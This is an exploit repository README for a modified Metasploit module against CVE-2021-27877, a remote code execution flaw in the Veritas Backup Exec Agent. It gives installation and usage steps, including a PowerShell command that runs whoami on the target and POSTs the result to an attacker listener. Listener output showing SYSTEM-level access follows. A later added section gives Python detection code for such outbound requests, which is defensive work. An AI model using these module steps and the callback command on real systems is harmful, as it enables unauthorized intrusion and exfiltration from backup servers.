## https://sploitus.com/exploit?id=34CCFAD0-8C43-5B1F-B129-EC944F9BD546
# CVE-2021-27877 Proof of Concept

This repository contains a modified version of the original Rapid7 Metasploit module for CVE-2021-27877 affecting the Veritas Backup Exec Agent.

During my testing, the original Metasploit module successfully identified the target as vulnerable but consistently failed to establish a session because the payload delivery stage was unsuccessful. However, analysis of the module showed that authentication and the underlying command execution functionality were working correctly.

To simplify vulnerability validation, I modified the module to execute user-supplied operating system commands directly through the vulnerable NDMP command execution functionality instead of uploading and executing a payload. This makes it easier to confirm remote code execution without relying on a reverse shell or payload staging.

> **Disclaimer:** This proof of concept is provided for educational purposes and authorized security testing only. Only use it against systems you own or have explicit permission to assess.

> **Note:** To protect the environment used during testing, all IP addresses in this repository have been anonymized. Throughout the examples, `192.168.x.x` represents the target host, while `192.168.y.y` represents the attacking system or listener. These substitutions do not affect the functionality of the proof of concept.

---

## Changes

Compared to the original Rapid7 module, the following modifications have been made:

- Added a new `COMMAND` runtime option.
- Removed the dependency on uploading a payload.
- Executes a single user-specified command.
- Does not attempt to establish a Meterpreter session.

---

## Installation

Copy the modified module into your local Metasploit modules directory.

```bash
cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
```

Start (or restart) Metasploit and reload local modules:

```text
msfconsole
reload_all
```

---

## Usage

Before running the module, start an HTTP listener (or any web server capable of receiving and displaying HTTP POST requests). This listener will receive the output of the command executed on the target.

For example, you can use a simple Python HTTP server with a custom request handler, `nc`, or any HTTP listener of your choice.

Load the module:

```text
use exploit/multi/veritas/beagent_sha_auth_rce_custom
```

Configure the required options:

```text
set RHOSTS 192.168.x.x
set RPORT 10000

set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"

run
```

The `COMMAND` option accepts any command you wish to execute on the target.

---

## Retrieving Command Output

This module is designed to execute a single command and **does not return command output automatically**.

To retrieve output, use an appropriate callback mechanism within your command (for example, an HTTP POST request or another outbound channel) and monitor your listener.

Example listener output:

```text
Listening on 0.0.0.0 8080
Connection received on 192.168.x.x 26006
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.14393.9234
Content-Type: application/x-www-form-urlencoded
Host: 192.168.y.y:8080
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive

nt authority\system
```
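
For defenders, the request captured above carries several traits that a proxy or network sensor can match on when a backup server makes outbound HTTP calls. The following is an added example, not part of the original repository or the Rapid7 module; the function names, indicator labels and both sample requests are constructed for illustration, and `198.51.100.7` stands in for the anonymized `192.168.y.y` host.

```python
import ipaddress

# Constructed samples: SUSPECT mirrors the listener capture shown above,
# BENIGN is an ordinary request for contrast.
SUSPECT = (
    "POST / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) "
    "WindowsPowerShell/5.1.14393.9234\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 198.51.100.7:8080\r\n"
    "Content-Length: 19\r\n"
    "Expect: 100-continue\r\n\r\n"
    "nt authority\\system"
)
BENIGN = (
    "GET /updates/manifest.xml HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Host: updates.example.com\r\n\r\n"
)

def parse_request(raw):
    # Split head from body, then the request line from the header lines.
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    return request_line.split(" ", 1)[0], headers, body

def host_is_ip_literal(host_header):
    # Strip the port; a bracketed host is an IPv6 literal.
    if host_header.startswith("["):
        host = host_header[1:].split("]", 1)[0]
    else:
        host = host_header.split(":", 1)[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def findings(raw):
    # Return the labels of every indicator present in one raw HTTP request.
    method, headers, body = parse_request(raw)
    checks = {
        "powershell-user-agent": "windowspowershell/" in headers.get("user-agent", "").lower(),
        "post-to-ip-literal": method == "POST" and host_is_ip_literal(headers.get("host", "")),
        "system-identity-in-body": "nt authority\\system" in body.lower(),
    }
    return [name for name, hit in checks.items() if hit]
```

Any single indicator can occur in legitimate administration scripts, so the combination on a host running the Backup Exec Agent is the signal worth alerting on.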

---

## References

- [Rapid7 Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb)
- [Veritas Security Advisory (VTS21-001)](https://www.veritas.com/support/en_US/security/VTS21-001)
- [Medium Article](https://yashswarup12.medium.com/cve-2021-27877-analyzing-and-exploiting-veritas-backup-exec-remote-code-execution-5e31bc41eeef)

---

## Credits

- Original Metasploit module: Rapid7
- Modifications: Yash Swarup